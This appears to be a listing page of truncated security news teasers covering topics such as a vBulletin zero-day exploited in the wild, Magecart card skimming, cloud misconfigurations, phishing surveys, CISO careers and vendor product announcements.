As a security executive, you have a curious gig. On one hand, you’re responsible for securing your organization across multiple systems, networks, clouds, and geographies. On the other, your team owns none of those things. Organizing resources in a way that makes visibility possible beyond the data center (assuming you have that to begin with) is hard. That’s because the way you achieve visibility in the cloud, or at the edge, is fundamentally different than … More


Should the National Security Council restore the cybersecurity coordinator role?

Former national security advisor John Bolton’s elimination of the cybersecurity coordinator role in May 2018 came as a surprise to many in the cybersecurity industry, especially security professionals that are tasked with securing federal networks, protecting critical infrastructure and providing cybersecurity governance. The role was created to help orchestrate and integrate the government’s cyber policies, make sure federal agencies have adequate cybersecurity funding and coordinate responses to major cybersecurity incidents. Many believe that the abolishment … More


Podcast: Potential problems with the software supply chain for industrial sites

Industrial security pioneer Eric Byres, CEO of aDolus, speaks to software supply chain trust issues and some of the technology his new venture aDolus Inc. is developing to help. In this podcast, Andrew Ginter talks to Eric Byres about potential problems with the software supply chain for industrial sites. They ask how users can trust the firmware and software that they load into their industrial control systems.


Cybercriminals plan to make L7 routers serve card stealing code

One of the Magecart cybercriminal groups is testing a new method for grabbing users’ credit card info: malicious skimming code that can be loaded into files used by L7 routers. What is Magecart? Magecart is an umbrella label for a growing number of cybercriminal groups that perform JavaScript-based credit card skimming attacks, usually by: compromising individual e-commerce sites; compromising third-party sources of scripts that online shop owners use to add various functionalities or serve ads … More


How can we thwart email-based social engineering attacks?

More than 99 percent of cyberattacks rely on human interaction to work, Proofpoint recently shared. More often than not, the principal attack method is phishing emails. When hitting enterprises, attackers love to impersonate Microsoft the most, as Office 365 is increasingly the heart of companies, providing the essential services (email, chat, document management, project management, etc.) that businesses depend on to run. They also constantly refine their tools and techniques. “While one-to-one attacks and one-to-many … More


Tackling biometric breaches, the decentralized dilemma

A recent discovery by vpnMentor revealed a worst-case scenario for biometrics: a large cache of biometric data being exposed to the rest of the world. In this case, the web-based biometric security smart lock platform BioStar 2 was breached. This breach surfaces a common flaw that many of the established providers of biometric authentication have built into their systems. Many biometric providers store biometrics in a large centralized database. To avoid a biometric dystopia, adoption … More


Cybersecurity breach experience strengthens CVs

It is in businesses’ best interest to hire cybersecurity leaders who have suffered an avoidable breach, because of the way it changes how security professionals think, feel and behave, according to Symantec. The findings reveal that suffering a breach – and coming out the other side – significantly reduces security leaders’ future workplace stress levels, while improving their likelihood to share knowledge. “It might sound counter intuitive at first,” comments Darren Thomson, CTO, Symantec EMEA, … More


Employees are mistakenly confident that they can spot phishing emails

While a majority (79%) of people say they are able to distinguish a phishing message from a genuine one, nearly half (49%) also admit to having clicked on a link from an unknown sender while at work, according to a Webroot survey. Further, nearly half (48%) of respondents said their personal or financial data had been compromised by a phishing message. However, of that group more than a third (35%) didn’t take the basic step … More


Adopting DevOps practices leads to improved security posture

A strong DevOps culture based on collaboration and sharing across teams leads to an improved security posture, according to Puppet. Twenty-two percent of the firms at the highest level of security integration have reached an advanced stage of DevOps maturity, compared to only six percent of the firms with no security integration. Additionally, the report found that Europe is pulling ahead of the US and the Asia Pacific regions when it comes to firms with … More


vBulletin zero-day exploited in the wild in wake of exploit release

An anonymous bug hunter has released a working and elegantly simple exploit for a pre-authentication remote code execution flaw (CVE-2019-16759) affecting vBulletin and it didn’t take long for attackers to start using it. About vBulletin vBulletin is the most popular internet forum software in use today. W3Techs says that around 0.1% of all internet sites run a vBulletin forum, though only 6.4% of these use vulnerable 5.x versions. MH Sub I, the company that develops … More


Cybersecurity automation? Yes, wherever possible

There was a time when companies were hesitant about their IT and security teams using automation to discharge some of their duties. “I think much of that was due to the feeling that if a task was automated and something went wrong, IT was not in control and did not have as much visibility,” Candace Worley, Chief Technical Strategist at McAfee, told Help Net Security. But the increasing quantity and sophistication of threats, the massive … More


How can small companies with limited budgets win at security?

Securing data and systems is a must for every modern organization, but smaller ones often have to deal with budget and workforce limitations that make that goal harder to achieve. We’ve asked Chris Wysopal, CTO at Veracode and well-renowned security expert who is scheduled to hold a keynote at HITB+ CyberWeek on the topic of distributing security more evenly across all technology, to offer some advice for under-resourced organizations. Zero Trust Wysopal advises opting for … More


Rise of RDP as a target vector

Recent reports of targeted attacks using RDP as an initial entry vector have certainly caused significant headlines in light of the impact they have caused. In the midst of city-wide impacts, or even million dollar (plus) demands, it is easy to overlook the initial entry vector. What began as ‘targeted’ emails focusing on predominantly consumers, the evolution of ransomware has widened to incorporate pseudo attacks intended purely for destruction (e.g. no viable decryption capability, … More

99% of misconfiguration incidents in the cloud go unnoticed

IaaS is now the fastest growing area of the cloud due to the speed, cost and reliability with which organizations can create and deploy applications, according to McAfee. Cloud-Native Breach (CNB) attack chain The results of the survey demonstrate that 99 percent of IaaS misconfigurations go unnoticed—indicating awareness around the most common entry point to new “Cloud-Native Breaches” (CNB) is extremely low. “In the rush toward IaaS adoption, many organizations overlook the shared responsibility model … More

Older vulnerabilities and those with lower severity scores still being exploited by ransomware

Almost 65% of top vulnerabilities used in enterprise ransomware attacks targeted high-value assets like servers, close to 55% had CVSS v2 scores lower than 8, nearly 35% were old (from 2015 or earlier), and the vulnerabilities used in WannaCry are still being used today, according to RiskSense. The data was gathered from a variety of sources including RiskSense proprietary data, publicly available threat databases, as well as findings from RiskSense threat researchers and penetration testers. … More

Security capabilities are lagging behind cloud adoption

Security professionals regard their existing tools as inadequate for securing critical cloud data, even as their organizations invest heavily, with increasing speed, in cloud applications, according to ESG. The report, based on surveys with responses ranging from approximately 392-600 senior IT decision makers and cyber security professionals, reveals that cloud-first strategies are becoming more common, with 39 percent of respondents from cloud-first organizations saying that they only consider on-premises if someone makes a compelling business case … More

Whitepaper: The self-fulfilling prophecy of the cybersecurity skills shortage

The tale of two sides: how would cybersecurity pros and organizations solve the cybersecurity skills gap shortage? eSentire asked cybersecurity experts to weigh in on the widening cybersecurity skills shortage by surveying hundreds of cybersecurity professionals and organizations. The results reflect how a self-fulfilling prophecy has compounded the problem, and what can be done to address the challenges in the future. Read The Self-Fulfilling Prophecy of the Cybersecurity Skills Shortage to get perspectives on the … More

Microsoft drops emergency Internet Explorer fix for actively exploited zero-day

Microsoft has unexpectedly released out-of-band security updates to fix vulnerabilities in Internet Explorer and Microsoft Defender. The IE zero-day bug is deemed “critical”, as it’s being actively exploited to achieve partial or complete control of a vulnerable system. The Internet Explorer vulnerability (CVE-2019-1367) CVE-2019-1367 is a memory corruption vulnerability in the scripting engine that could be exploited to achieve remote code execution. An attacker who successfully exploited the vulnerability could gain the same user rights … More

Could audio warnings augment your ability to fight off cyber attacks?

The security of your environment shouldn’t depend on whether you’re looking in the right place at the right time. While active visual means such as dashboards, emails, tickets, and chat messages are a vital part of security event monitoring, they might not get your attention if your eyes are elsewhere. Even when you’re focused on the right screen, important events can easily get buried in an overload of information, delaying their processing – or allowing … More

CISO role grows in stature, but challenges remain

In order to find out how CISOs perceive the state of their profession, Optiv Security interviewed 200 CISOs or senior security personnel with equivalent responsibilities in both the US and the UK. Perceiving cybersecurity Survey respondents indicated a fundamental change in how senior executives and board members perceive cybersecurity. Perhaps most surprising was the fact that 58% said experiencing a data breach makes them more attractive to potential employers. This stands in stark contrast to … More

Passwordless authentication is here now, and it is vastly superior to using a password

Mirko Zorz, Help Net Security’s Editor in Chief, recently published an article about the state of passwordless authentication that predicted a long journey before this technology is viable. We would like to share that passwordless multi-factor authentication is a reality today. Large and respected organizations, including a significant healthcare software provider, are already using this technology with great success. Here is how TraitWare has completed the journey to deliver passwordless authentication. Passwordless authentication doesn’t have … More

What security and privacy enhancements has iOS 13 brought?

With the release of iPhone 11 and its two Pro variants, Apple has released iOS 13, a substantial functional update of its popular mobile operating system. But while many users are happy to finally get a complete Dark Mode for the device or a better phone camera, some are more interested in security and privacy enhancements. Location data On iOS 13, users will be able to control the location data shared with apps with more … More

How data breaches forced Amazon to update S3 bucket security

Amazon launched its Simple Storage Service (better known as S3) back in 2006 as a platform for storing just about any type of data under the sun. Since then, S3 buckets have become one of the most commonly used cloud storage tools for everything from server logs to customer data, with prominent users including Netflix, Reddit, and GE Healthcare. While S3 rolled out of the gate with good security principles in mind, it hasn’t all … More

Disclosing vulnerabilities to improve software security is good for everyone

Today, software companies and security researchers are near universal in their belief that disclosing vulnerabilities to improve software security is good for everyone, according to a Veracode report. 451 Research conducted the survey from December 2018 to January 2019 using a representative sample of 1,000 respondents across a range of industries and organization sizes in the US, Germany, France, Italy and the UK. Survey respondents reported enterprise roles such as application development, infrastructure and information security, … More

How SMBs can bring their security testing on par with larger enterprises

What are the challenges of securing small and medium-sized enterprises vs. larger ones? And how can automated, continuous security testing help shrink the gap? When studying the differences between cyber security for small and medium sized enterprises (SMEs) and larger enterprises, several components factor into how securing SMEs is different. Here’s a breakdown. Business hour coverage To monitor systems for suspicious activity, larger enterprises have security operations teams working in shifts 24×7. At best, SMEs … More

Product showcase: NetLib Security Encryptionizer

NetLib Security has spent the past 20+ years developing a powerful, patented solution that starts by setting up a defense for any organization wherever your data resides: physical, virtual and cloud. Our platform is geared to simplify the process for you while ensuring unprecedented levels of security are in place. NetLib Security encryption solutions do not require specialized skill sets, programming changes, or administrative overhead; we simplify your data security needs with an affordable solution … More

Should you trust your smart TV or streaming device?

“Smart” devices might be handy and offer higher quality services, but users should be aware that everything comes with a price. And we’re not talking here about the price of the actual device, but of the fact that these devices collect device, user and user behavior information and send it to a variety of third-parties. This information might currently be worthless to users, but it’s worth a lot to companies: it is used to improve … More

Organizations continue to struggle with privacy regulations

Many organizations’ privacy statements fail to meet common privacy principles outlined in GDPR, CCPA, PIPEDA, including the user’s right to request information, to understand how their data is being shared with third parties and the ability of that information to be deleted upon request, according to the Internet Society’s Online Trust Alliance (OTA). Organizations also have a duty to notify users of their rights in an easily understandable manner. OTA analyzed 29 variables in 1,200 … More

How organizations view and manage cyber risk

Amid a wider range of issues to handle, a majority of board members and senior executives responsible for their organization’s cyber risk management had less than a day in the last year to spend focused on cyber risk issues, the 2019 Marsh Microsoft Global Cyber Risk Perception Survey results have revealed. This lack of time for senior leaders to focus on cyber risk comes as concern over cyber threats hits an all-time high, and as … More

A bug made some Windows Defender antivirus scans fail

Microsoft has released a fix for a bug that made its Windows Defender Antivirus fail after a few seconds when users opted for a Quick or Full scan of the system. Users are advised to implement security intelligence update (virus definitions) v1.301.1684.0 or later to get the software back on track. Bundled antivirus protection Windows Defender Antivirus is an anti-malware component of Microsoft Windows 10 – in essence, free antivirus software. The software used to … More

(IN)SECURE Magazine issue 63 released

(IN)SECURE Magazine is a free digital security publication discussing some of the hottest information security topics. Issue 63 has been released today. It’s a free download, no registration required. Table of contents Identifying evasive threats hiding inside the network Inside the NIST team working to make cybersecurity more user-friendly Report: Black Hat USA 2019 Healthcare’s blind spot: Unmanaged IoT and medical devices What the education industry must do to protect itself from cyber attacks Solving … More

SLAs: What your cybersecurity vendor isn’t telling you

Service Level Agreements (SLAs) have been used in the IT world for many years as a contractual mechanism for holding service providers accountable and extracting defined payments and penalties when they mess up. Likewise, vendors have used SLAs to put their “money where their mouth is” in terms of fulfilling value promises and establishing important metrics for their customers. In reality, SLAs have not kept up with either of these purposes. For most IT pros, … More

The use of open source software in DevOps has become strategic for organizations of all sizes

A higher percentage of top performing teams in enterprise organizations are using open source software, according to a survey conducted by DevOps Research and Assessment (DORA) and Google Cloud. Additionally, the proportion of Elite performers (highest performing teams) nearly tripled from last year, showing that DevOps capabilities are driving performance. These findings reflect organizations’ increased willingness to embrace investments in technology to deliver value and the use of open source – even in highly regulated, … More

World’s top 25 CTF teams to battle for $100,000 at HITB PRO CTF

In less than a month, Hack In The Box is launching its biggest global event: HITB+CyberWeek 2019. It is a week-long gathering (October 12-17, 2019, at Emirates Palace, Abu Dhabi) that will bring together the world’s top cyber security experts to share and discuss their latest knowledge, ideas and techniques with security professionals and students. Aside from offering the usual trainings and talks, HITB has been developing specific content and challenges for the wider student … More

Security is slowly becoming essential to doing business

A veteran of the information security industry, Greg Jensen has spent the last six years at Oracle as the Senior Director of Oracle’s Cloud Security solutions. He’s also the Senior Editor of the Oracle and KPMG Cloud Threat Report, as well as Oracle’s annual CISO Report. “The focus of these efforts is to understand the key challenges that hundreds of global organizations are struggling with as they lift and shift workloads to the cloud, and … More

Confidential data of 24.3 million patients discovered online

Greenbone Networks has released details of new research into the security of the servers used by health providers across the world to store images of X-rays as well as CT, MRI and other medical scans. Of the 2,300 medical image archive systems worldwide that Greenbone analyzed between mid-July and early September 2019, 590 of them were freely accessible on the internet, together containing 24.3 million data records from patients located in 52 different countries. … More

Download: RFP templates for EDR/EPP and APT protection

Security decision makers need to address APT risks, but struggle with mapping APT attack vectors to a clear-cut set of security product capabilities, which impairs their ability to choose the products that would best protect them. Cynet is addressing this need with the definitive RFP templates for EDR/EPP and APT protection, an expert-made security requirement list, that enables stakeholders to accelerate and optimize the evaluation process of the products they evaluate. The RFP contains five … More

Five ways to manage authorization in the cloud

The public cloud is being rapidly incorporated by organizations, allowing them to store larger amounts of data and applications with higher uptime and reduced costs, while at the same time, introducing new security challenges. One of the more prominent challenges is identity management and authorization. Since the beginning of cloud computing, authorization techniques in the cloud have evolved into newer models, which acknowledge the many different services that now come together to form a company’s … More

Targeted threat intelligence and what your organization might be missing

In this Help Net Security podcast recorded at Black Hat USA 2019, Adam Darrah (Director of Intelligence), Mike Kirschner (Chief Operating Officer) and Christian Lees (Chief Technology Officer) from Vigilate, talk about how their global threat hunting and dark web cyber intelligence research team extends the reach of a company’s security resources, and lives within the underground community to remain ahead of emerging threats. Where many other solutions rely on machine learning (ML) to access … More

Researchers uncover 125 vulnerabilities across 13 routers and NAS devices

In a cybersecurity study of network attached storage (NAS) systems and routers, Independent Security Evaluators (ISE) found 125 vulnerabilities in 13 IoT devices, reaffirming an industrywide problem of a lack of basic security diligence. The vulnerabilities discovered in the SOHOpelessly Broken 2.0 research likely affect millions of IoT devices. “Our results show that businesses and homes are still vulnerable to exploits that can result in significant damage,” says lead ISE researcher Rick Ramgattie. “These issues … More

BotSlayer tool can detect coordinated disinformation campaigns in real time

A new tool in the fight against online disinformation has been launched, called BotSlayer, developed by Indiana University’s Observatory on Social Media. The software, which is free and open to the public, scans social media in real time to detect evidence of automated Twitter accounts – or bots – pushing messages in a coordinated manner, an increasingly common practice to manipulate public opinion by creating the false impression that many people are talking about … More

Mini eBook: CCSP Practice Tests

The Certified Cloud Security Professional (CCSP) shows you have the advanced technical skills and knowledge to design, manage and secure data, applications and infrastructure in the cloud using best practices, policies and procedures. Download the Mini eBook for a sneak peek into the Official (ISC)² CCSP Practice Tests book. Inside you’ll find: 50 CCSP practice test items and answers to gauge your knowledge. Discount code to save on the full version which includes 1,000 items.

CISO do’s and don’ts: Lessons learned

Keeping a business safe from cyber threats while allowing it to thrive is every CISO’s goal. The task is not easy: a CISO has to keep many balls in the air while being buffeted by an increasingly complex and always shifting threat landscape. Consequently, the importance of a good CISO should not be underestimated. Mistakes to avoid, practices to implement Francesco Cipollone, CISO and director at UK-based cybersecurity consultancy NSC42, says that he has seen … More

Threat visibility is imperative, but it’s even more essential to act

Cyberthreats are escalating faster than many organizations can identify, block and mitigate them. Visibility into the expanding threat landscape is imperative, but according to a new threat report released by CenturyLink, it is even more essential to act. “As companies focus on digital innovation, they are entering a world of unprecedented threat and risk,” said Mike Benjamin, head of CenturyLink’s threat research and operations division, Black Lotus Labs. “Threats continue to evolve, as do bad … More

Four in five businesses need ways to better secure data without slowing innovation

While data loss protection is critical to Zero Trust (ZT), fewer than one in five organizations report their data loss prevention solutions provide transformational benefits and more than 80 percent say they need a better way to secure data without slowing down innovation, according to Code42. ZT architectures are based on the principle of “trust no one, verify everything,” abolishing the idea of a trusted network within a data security perimeter and requiring companies to … More

Exploitation of IoT devices and Windows SMB attacks continue to escalate

Cybercriminals upped the intensity of IoT and SMB-related attacks in the first half of 2019, according to a new F-Secure report. The report underscores the threats IoT devices face if not properly secured when online, as well as the continued popularity of Eternal Blue and related exploits two years after WannaCry. F-Secure’s honeypots – decoy servers that are set up to lure in attackers for the purpose of collecting information – measured a twelvefold increase … More

Sandboxie becomes freeware, soon-to-be open source

Sophos plans to open source Sandboxie, a relatively popular Windows utility that allows users to run applications in a sandbox. Until that happens, they’ve made the utility free. About Sandboxie Sandboxie creates a virtual container in which untrusted programs can be run or installed so that they can’t maliciously modify the underlying OS or data on the host machine. It can make the use of apps such as browsers, email programs, IM clients, Office suites, … More

New infosec products of the week: September 13, 2019

Awake Security enhances its platform with the ability to identify attackers based on their intent Awake Security introduced Adversarial Modeling, an industry-first capability that gives security teams an unparalleled ability to identify attackers based on their intent. By understanding mal-intent, versus looking for only specific indicators of an attack, Awake greatly improves the ability for organizations to see and stop attackers, especially those that are living-off-the-land. RocketBroadband’s SD-WAN solution allows businesses to keep critical apps … More

The rise of modern applications, DevSecOps and the intelligence economy

There has been a significant year-over-year growth in enterprise usage trends around multi-cloud adoption, open source technologies such as Kubernetes, and AWS cloud-native services adoption, Sumo Logic report reveals. The research also shows the increasing need for cloud-based security solutions such as cloud SIEM to help enterprises address today’s increasingly complex security landscape. The intelligence economy The report also provides a summary of three major trends shaping digital business today: the rise of modern applications, … More
